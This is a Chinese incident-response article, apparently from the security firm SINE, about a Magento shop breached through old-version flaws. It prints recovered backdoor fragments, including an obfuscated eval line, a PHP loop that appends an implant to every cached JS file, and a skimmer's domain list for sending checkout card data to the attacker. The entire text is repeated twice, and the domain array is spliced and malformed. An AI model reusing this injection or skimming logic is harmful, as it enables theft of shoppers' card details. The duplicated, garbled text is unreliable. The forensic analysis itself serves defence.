排查黑客攻击的问题时,很容易陷入只分析日志等细节的误区。其实,在进行任何分析之前,我们都需要先做以下几件事情:
第一,核实信息。这就像是我们在找错问题之前,需要先了解出现问题的具体细节和当前服务器的环境情况。
第二,断开服务器的外网链接,保障安全。这就像是把自家的大门关上,不让坏人轻松进入。
第三,保存服务器的环境,以及现场的各种信息,如端口网络、应用程序、日志文件等。这样,就像是在证据链中留下关键的线索,更有利于我们查找和分析问题,而且要注意不要有写操作哦!
在现场环境中,虽然我们可能无法找到确切的问题所在,但是可以通过查看历史日志,来检查是否存在服务器linux系统被提权等可疑行为。如果使用了chkrootkit、rkthunter和lynis等安全扫描工具,也未发现任何问题,那还是建议客户考虑更换服务器,以避免潜在的安全风险。
我们SINE安全首先从web层面去看,分析了网站访问日志,nginx日志,数据库日志发现有许多黑客攻击的痕迹,利用的都是Magento的一些高危漏洞进行的,也可以说明网站被入侵是由于magento低版本存在漏洞导致,我们立即展开对系统以及源代码的安全审计,人工去分析每一行代码,通过我们的检测,发现4个木马后门,如下:
bmMo\1122\x46jdGl\x76bicgLi\101kX1BP\x551R\x62\1122\105\x6e\x58\123k7CmV4aXQ7Cg=\075"; eval(_decode($VKGPOZ)); ?>
foreach (glob("/www/wwwroot/dev.******.com/pub/static/_cache/merged/*.js") as $filename) {
if (!preg_match("/lG68xv3NXN/", file_get_contents($filename))) {
file_put_contents($filename, _decode($implant), FILE_APPEND);
echo "updated: {$filename}\n";
} else {
echo "ok: {$filename}\n";
}
}
通过上面的代码我们可以发现都是一些webshell木马后门,像filemanPHP大马,一句话木马,以及定时篡改网站全部JS功能的代码,通过分析,我们SINE安全发现黑客入侵的目的不是为了挂马和挂黑链,而是为了盗取用户的信用卡信息,用于盗刷。我们对黑客植入到JS的代码进行了分析与解密,发现该JS代码是用来记录用户的信用卡信息,针对Magento支付相关页面(onepage|checkout|onestep|payment|transaction)中所有的表单信息,也会判断来路是从
const domains =["securecode.com","psncdn.com","googleadservices.com","googletagmanager.com","google.com"];"apprater.net","shopperapproved.com","chromecast-setup.com","ssl-images-amazon.com","google.com"];的用户,会将信用卡的信息POST发送到黑客的指定网站上。
第一,核实信息。这就像是我们在找错问题之前,需要先了解出现问题的具体细节和当前服务器的环境情况。
第二,断开服务器的外网链接,保障安全。这就像是把自家的大门关上,不让坏人轻松进入。
第三,保存服务器的环境,以及现场的各种信息,如端口网络、应用程序、日志文件等。这样,就像是在证据链中留下关键的线索,更有利于我们查找和分析问题,而且要注意不要有写操作哦!
在现场环境中,虽然我们可能无法找到确切的问题所在,但是可以通过查看历史日志,来检查是否存在服务器linux系统被提权等可疑行为。如果使用了chkrootkit、rkthunter和lynis等安全扫描工具,也未发现任何问题,那还是建议客户考虑更换服务器,以避免潜在的安全风险。
我们SINE安全首先从web层面去看,分析了网站访问日志,nginx日志,数据库日志发现有许多黑客攻击的痕迹,利用的都是Magento的一些高危漏洞进行的,也可以说明网站被入侵是由于magento低版本存在漏洞导致,我们立即展开对系统以及源代码的安全审计,人工去分析每一行代码,通过我们的检测,发现4个木马后门,如下:
bmMo\1122\x46jdGl\x76bicgLi\101kX1BP\x551R\x62\1122\105\x6e\x58\123k7CmV4aXQ7Cg=\075"; eval(_decode($VKGPOZ)); ?>
foreach (glob("/www/wwwroot/dev.******.com/pub/static/_cache/merged/*.js") as $filename) {
if (!preg_match("/lG68xv3NXN/", file_get_contents($filename))) {
file_put_contents($filename, _decode($implant), FILE_APPEND);
echo "updated: {$filename}\n";
} else {
echo "ok: {$filename}\n";
}
}
通过上面的代码我们可以发现都是一些webshell木马后门,像filemanPHP大马,一句话木马,以及定时篡改网站全部JS功能的代码,通过分析,我们SINE安全发现黑客入侵的目的不是为了挂马和挂黑链,而是为了盗取用户的信用卡信息,用于盗刷。我们对黑客植入到JS的代码进行了分析与解密,发现该JS代码是用来记录用户的信用卡信息,针对Magento支付相关页面(onepage|checkout|onestep|payment|transaction)中所有的表单信息,也会判断来路是从
const domains =["securecode.com","psncdn.com","googleadservices.com","googletagmanager.com","google.com"];"apprater.net","shopperapproved.com","chromecast-setup.com","ssl-images-amazon.com","google.com"];的用户,会将信用卡的信息POST发送到黑客的指定网站上。
